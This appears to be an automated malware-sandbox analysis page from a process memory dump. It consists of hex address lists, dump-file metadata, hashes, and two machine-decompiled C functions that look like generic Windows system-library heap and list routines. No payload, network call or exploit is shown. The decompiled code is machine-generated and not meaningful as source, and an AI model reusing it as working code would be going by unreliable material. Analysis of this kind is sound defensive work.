0x0348b394
0x0343d791
0x0343d798
0x0348b3a3
0x0348b3bb
0x0348b3bb
0x0343d7a5
0x0343d866
0x0343d870
0x0343d884
0x0343d892
0x0343d898
0x0343d89e
0x0343d8a0
0x0343d8a6
0x0343d8ac
0x0343d8ae
0x0343d8b4
0x0343d8b4
0x0343d8ae
0x0343d7a5
0x0343d78b
0x0343d7b1
0x0348b3c5
0x0348b3c5
0x0343d7c3
0x0343d7ca
0x0343d7e5
0x0343d7eb
0x0343d8eb
0x0343d8ed
0x00000000
0x0343d8f3
0x0343d8f3
0x0343d8f3
0x00000000
0x0343d8ed
0x0343d7cc
0x0343d7cc
0x0343d7d2
0x00000000
0x0343d7d4
0x0343d7d4
0x0343d7d7
0x0343d7df
0x0348b3d4
0x0348b3d9
0x0348b3dc
0x0348b3dc
0x0348b3df
0x0348b3e2
0x0348b468
0x0348b46d
0x0348b46f
0x0348b46f
0x0348b475
0x0343d8f8
0x0343d8f9
0x0343d8fd
0x0348b3e8
0x0348b3e8
0x0348b3eb
0x0348b3ed
0x00000000
0x0348b3ef
0x0348b3ef
0x0348b3f1
0x0348b3f4
0x0348b3fe
0x0348b404
0x0348b409
0x0348b40e
0x0348b410
0x0348b410
0x0348b414
0x0348b414
0x0348b41b
0x0348b420
0x0348b423
0x0348b425
0x0348b427
0x0348b42a
0x0348b42d
0x0348b42d
0x0348b42a
0x0348b432
0x0348b436
0x0348b438
0x0348b43b
0x0348b43b
0x0348b449
0x0348b44e
0x0348b454
0x0348b458
0x0348b458
0x0348b45d
0x00000000
0x0348b45d
0x0348b3ed
0x00000000
0x00000000
0x00000000
0x0343d7df
0x0343d7d2
0x0343d7ca
0x0348b37c
0x0348b37e
0x0348b385
0x0348b38a
0x00000000
0x0348b38a
0x0343d742
0x0343d7f1
0x0343d7f8
0x0348b49b
0x0348b49b
0x0343d800
0x0343d837
0x0343d843
0x0343d845
0x0343d847
0x0343d84a
0x0343d84b
0x0343d84e
0x0343d857
0x0343d802
0x0343d802
0x0343d80d
0x00000000
0x0343d818
0x0343d818
0x0343d824
0x0343d831
0x0348b4a5
0x0348b4ab
0x0348b4b3
0x0348b4b8
0x0348b4bb
0x00000000
0x0348b4c1
0x0348b4c1
0x0348b4c8
0x00000000
0x0348b4ce
0x0348b4d4
0x0348b4e1
0x0348b4e3
0x0348b4e5
0x00000000
0x0348b4eb
0x0348b4f0
0x0348b4f2
0x0343dac9
0x0343dacc
0x0343dacf
0x0343dad1
0x0343dd78
0x0343dd78
0x0343dcf2
0x00000000
0x0343dad7
0x0343dad9
0x0343dadb
0x00000000
0x00000000
0x0343dae1
0x0343dae1
0x0343dae4
0x0343dae6
0x0348b4f9
0x0348b4f9
0x0348b500
0x0343daec
0x0343daec
0x0343daf5
0x0343daf8
0x0343dafb
0x0343db03
0x0343db11
0x0343db16
0x0343db19
0x0343db1b
0x0348b52c
0x0348b531
0x0348b534
0x0343db21
0x0343db21
0x0343db24
0x0343dcd9
0x0343dce2
0x0343dce5
0x0343dd6a
0x0343dd6d
0x00000000
0x0343dd73
0x0348b51a
0x0348b51c
0x0348b51f
0x0348b524
0x00000000
0x0348b524
0x0343dce7
0x0343dce7
0x0343dce7
0x00000000
0x0343dce7
0x00000000
0x0343db2a
0x0343db2c
0x0343db31
0x0343db33
0x0343db36
0x0343db39
0x0343db3b
0x0343db66
0x0343db66
0x0343db3d
0x0343db3d
0x0343db3e
0x0343db46
0x0343db47
0x0343db49
0x0343db4c
0x0343db53
0x0343db55
0x0343db58
0x0343db5a
0x0348b50a
0x0348b50f
0x0348b512
0x0343db60
0x0343db60
0x0343db63
0x0343db63
0x00000000
0x0343db63
0x0343db5a
0x0343db3b
0x0343db24
0x0343db69
0x0343db69
0x0343db6c
0x0343db6f
0x0343db74
0x0348b557
0x0348b557
0x0348b55e
0x0343db7a
0x0343db7c
0x0343db7f
0x0343db82
0x0343db85
0x00000000
0x0343db8b
0x0343db8b
0x0343db8d
0x0343db9b
0x0343db9b
0x0343db9d
0x0343dba0
0x0343dba2
0x0343dba4
0x0343dba7
0x0343dba9
0x0343dbae
0x0343dbae
0x0343dbb1
0x0343dbb4
0x0343dbb4
0x0343dbb7
0x0343dbba
0x0343dcd2
0x0343dcd4
0x00000000
0x0343dbc0
0x0343dbc0
0x0343dbd2
0x0343dbd7
0x0343dbda
0x0343dbdd
0x0343dbdf
0x00000000
0x0343dbe5
0x0343dbe5
0x0343dbee
0x0343dbf1
0x0348b541
0x0348b544
0x00000000
0x0348b546
0x0348b546
0x00000000
0x0348b546
0x0343dbf7
0x0343dbf7
0x0343dbfd
0x0343dbfd
0x0343dbff
0x0343dc0b
0x0343dc15
0x0343dc1b
0x0343dc1d
0x0343dc21
0x0343dc21
0x0343dc23
0x0343dc23
0x0343dc26
0x0343dc29
0x0343dc2b
0x00000000
0x00000000
0x0343dc31
0x0343dc34
0x0343dc36
0x0343dcbf
0x0343dcbf
0x0343dcc2
0x00000000
0x0343dc3c
0x0343dc41
0x0343dc43
0x00000000
0x0343dc45
0x0343dc45
0x0343dc47
0x00000000
0x0343dc4d
0x0343dc4d
0x0343dc50
0x0343dc52
0x0343dc55
0x0343dcfa
0x0343dcfe
0x0343dd08
0x0343dd0a
0x0343dd0c
0x00000000
0x0343dd12
0x0343dd15
0x0343dd2d
0x0343dd2f
0x0343dd32
0x0343dd35
0x00000000
0x0343dd35
0x0343dc5b
0x0343dc5b
0x0343dc5e
0x0343dc61
0x0343dc64
0x0343dc67
0x0343dc67
0x0343dc6a
0x0343dc6c
0x0343dc8e
0x0343dc8e
0x0343dc91
0x0343dc93
0x0343dcce
0x0343dcce
0x0343dc95
0x0343dc9c
0x0343dc6e
0x0343dc72
0x0343dc75
0x0343dc77
0x0343dc79
0x0348b551
0x0348b551
0x00000000
0x0343dc7f
0x0343dc7f
0x0343dc81
0x00000000
0x0343dc83
0x0343dc86
0x0343dc88
0x00000000
0x00000000
0x00000000
0x00000000
0x0343dc88
0x0343dc81
0x0343dc79
0x0343dc6c
0x0343dc55
0x0343dc47
0x0343dc43
0x00000000
0x0343dc36
0x0343dc23
0x00000000
0x0343dbff
0x0343dbf1
0x0343dbdf
0x0343db8f
0x0343db92
0x0343db95
0x00000000
0x00000000
0x00000000
0x00000000
0x0343db95
0x0343db8d
0x0343db85
0x0343db74
0x0343dc9f
0x0343dca2
0x0343dcb0
0x0343dcb0
0x0343dad1
0x0348b4e5
0x0348b4c8
0x00000000
0x00000000
0x00000000
0x0343d831
0x0343d80d
0x00000000
0x0343d800
0x0348b47f
0x0348b485
0x00000000
0x0348b485
0x0343d665
0x0343d652
0x00000000

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e28b6ecea18515920d706e59685a41cb3ab70563c86b051cb8a1917beacee06
Instruction ID: 9dacfbe41be864e4a96013060317e7dc9d18a3fa6dffdce22af5bad0b7b5d701
Opcode Fuzzy Hash: 9e28b6ecea18515920d706e59685a41cb3ab70563c86b051cb8a1917beacee06
Instruction Fuzzy Hash: 69E19F34A003598FEB24EB19C944B6EB7B5BF4B304F0801AAD8195F3A0D774A986CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0343849B, Relevance: .3, Instructions: 290
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E0343849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0x34ff9c0);
				E0347D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0x3517b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E0343CEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E03442280( *[fs:0x30], 0x3518550);
						_t139 =  *0x3517b04; // 0x1
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E0345F3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E0343FFB0(_t193, _t235, 0x3518550);
								L5:
								return E0347D130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E03421C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0x3517b9c; // 0x0
							_t235 = L03444620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0x3517b10; // 0x0
								 *(_t237 - 0x4c) = _t150;
								_push(_t237 - 0x74);
								_push(_t237 - 0x39);
								_push(_t237 - 0x58);
								_t193 = E0345A61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E0343FFB0(_t193, _t235, 0x3518550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L034477F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L034477F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0x3517b04; // 0x1
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0x3517b10; // 0x0
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E034637C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0x3517b9c; // 0x0
									_t214 = L03444620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												E034637F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0x3517b10 =  *0x3517b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0x3517b04 =  *0x3517b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L034477F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L034477F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0x3517b08 =  *0x3517b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E034657C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E0346F3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L034477F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E0345A44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L034477F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E034696C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

0x0343849b
0x0343849b
0x0343849b
0x0343849b
0x0343849d
0x034384a2
0x034384a7
0x034384b1
0x034384d8
0x00000000
0x034384b3
0x034384c4
0x034384c9
0x034384cd
0x034384cf
0x034384cf
0x034384d6
0x034384e6
0x034384e9
0x034384ec
0x034384ef
0x034384f2
0x034384f4
0x034384fc
0x03438501
0x03438506
0x03438509
0x034386e0
0x034386e5
0x034386e8
0x034386ed
0x034386f0
0x034386f2
0x03489afd
0x03489b02
0x034384da
0x034384df
0x034384df
0x034386fa
0x034386fd
0x034386fe
0x03438701
0x03438706
0x03438709
0x0343870b
0x00000000
0x00000000
0x03438711
0x03438725
0x03438727
0x0343872a
0x0343872c
0x03489af0
0x03489af5
0x03438732
0x03438732
0x03438732
0x03438735
0x03438737
0x03438515
0x03438515
0x03438518
0x0343851d
0x03438523
0x03438527
0x0343852b
0x03438537
0x03438539
0x0343853c
0x0343853e
0x0343868c
0x03438691
0x03438699
0x0343869b
0x03438744
0x03438748
0x034386a1
0x034386a1
0x034386a1
0x034386a4
0x034386a8
0x03489bdf
0x03489bdf
0x034386ae
0x034386b0
0x00000000
0x034386b6
0x00000000
0x03489be9
0x034386b0
0x03438544
0x0343854a
0x0343854d
0x03438551
0x0343876e
0x03438778
0x0343877b
0x03438780
0x03438557
0x03438557
0x0343855d
0x0343855d
0x0343856b
0x0343856e
0x03438570
0x03438573
0x03438576
0x03438576
0x03438579
0x0343857b
0x00000000
0x00000000
0x03438581
0x034385a0
0x034385a2
0x034385a5
0x034385a7
0x03489b1b
0x03489b1b
0x0343862e
0x0343862e
0x03438631
0x03438631
0x03438634
0x03438636
0x03438669
0x03438669
0x0343866b
0x03489bbf
0x03489bc4
0x03489bc8
0x03489bce
0x03489bce
0x03438671
0x03438671
0x03438674
0x03438676
0x03489bae
0x03489bae
0x03438676
0x0343867c
0x0343867e
0x03438688
0x03438688
0x00000000
0x0343867e
0x03438638
0x03438638
0x0343863b
0x0343863e
0x0343863f
0x03438642
0x03438645
0x03438648
0x0343864d
0x03489b69
0x03489b6e
0x03489b7b
0x03489b81
0x03489b85
0x03489b89
0x03489ba7
0x03489b8b
0x03489b91
0x03489b9a
0x03489b9f
0x03489b9f
0x03438788
0x0343878d
0x03438763
0x03438763
0x03438766
0x00000000
0x03438766
0x03489b70
0x00000000
0x03489b70
0x03438656
0x0343865a
0x0343865c
0x03438752
0x03438756
0x00000000
0x00000000
0x0343875e
0x00000000
0x0343875e
0x03438662
0x03438662
0x03438662
0x03438666
0x00000000
0x03438666
0x034385b7
0x034385b9
0x034385bc
0x034385bf
0x034385cc
0x034385d1
0x034385d4
0x034385db
0x034385de
0x034385e0
0x03489b5f
0x00000000
0x03489b5f
0x034385e6
0x034385ea
0x034386c3
0x034386c5
0x034386c8
0x034386ca
0x03489b16
0x00000000
0x03489b16
0x034386d6
0x034385f6
0x034385f6
0x034385f9
0x03438602
0x03438606
0x0343860a
0x0343860b
0x0343860e
0x03438611
0x00000000
0x03438611
0x034385f3
0x00000000
0x034385f3
0x03438619
0x0343861e
0x0343861e
0x03438621
0x03438622
0x03438623
0x03438625
0x0343862c
0x00000000
0x0343873d
0x00000000
0x0343873d
0x03438737
0x0343850f
0x03438512
0x00000000
0x03438512
0x00000000
0x034384d6

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9557f60ec54c9c27834b14a5fdd9e757bd60815af122360acb33474d937ef7b9
Instruction ID: 27eebb623ea6566c30d19725fde70c379699314b2eced6e75d1cec9f75efef51
Opcode Fuzzy Hash: 9557f60ec54c9c27834b14a5fdd9e757bd60815af122360acb33474d937ef7b9
Instruction Fuzzy Hash: BEB149B4E00309DFDB14DFA9C980AAEFBB9BF49304F14412AE415AF355D770A94ACB58

Uniqueness

Uniqueness Score: -1.00%

Function 0345513A, Relevance: .3, Instructions: 258
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0345513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x351d360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E0346D0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E03442280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L03444620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E0346F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E0343FFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x351b1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E0346B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}

0x03455142
0x0345514c
0x03455150
0x03455157
0x03455159
0x0345515e
0x03455165
0x03455169
0x0345516c
0x03455172
0x03455176
0x0345517a
0x0345517a
0x0345517a
0x0345517f
0x03496d8b
0x03496d8e
0x03496d91
0x03496d95
0x03496d98
0x03496d9c
0x03496da0
0x03496da3
0x03496da7
0x03496e26
0x03496e26
0x03496e2a
0x034551f9
0x034551f9
0x034551fe
0x03496e33
0x03496e33
0x03496e39
0x03496e3d
0x03496e46
0x03496e50
0x00000000
0x00000000
0x03496e52
0x03496e53
0x03496e56
0x03496e5d
0x00000000
0x00000000
0x00000000
0x03496e5f
0x03496e67
0x03496e77
0x03496e7f
0x03496e80
0x03496e88
0x03496e90
0x03496e9f
0x03496ea5
0x03496ea9
0x03496eb1
0x03496ebf
0x00000000
0x00000000
0x03496ecf
0x03496ed3
0x00000000
0x00000000
0x03496edb
0x03496ede
0x03496ee1
0x03496ee8
0x03496eeb
0x03496eed
0x03496ef0
0x03496ef4
0x03496ef8
0x03496efc
0x00000000
0x00000000
0x03496f0d
0x03496f11
0x03496f32
0x03496f37
0x03496f3b
0x03496f3e
0x03496f41
0x03496f46
0x00000000
0x00000000
0x03496f4c
0x03496f50
0x03496f50
0x03496f54
0x03496f62
0x03496f65
0x03496f6d
0x03496f7b
0x03496f7b
0x03496f93
0x03496f98
0x03496fa0
0x03496fa6
0x03496fb3
0x03496fb6
0x03496fbf
0x03496fc1
0x03496fd5
0x03496fda
0x03496fda
0x03496fdd
0x03496fe2
0x03496fe7
0x03496feb
0x03496fef
0x03496ff3
0x0345520c
0x0345520c
0x0345520f
0x03455215
0x03455234
0x0345523a
0x0345523a
0x03455244
0x03455245
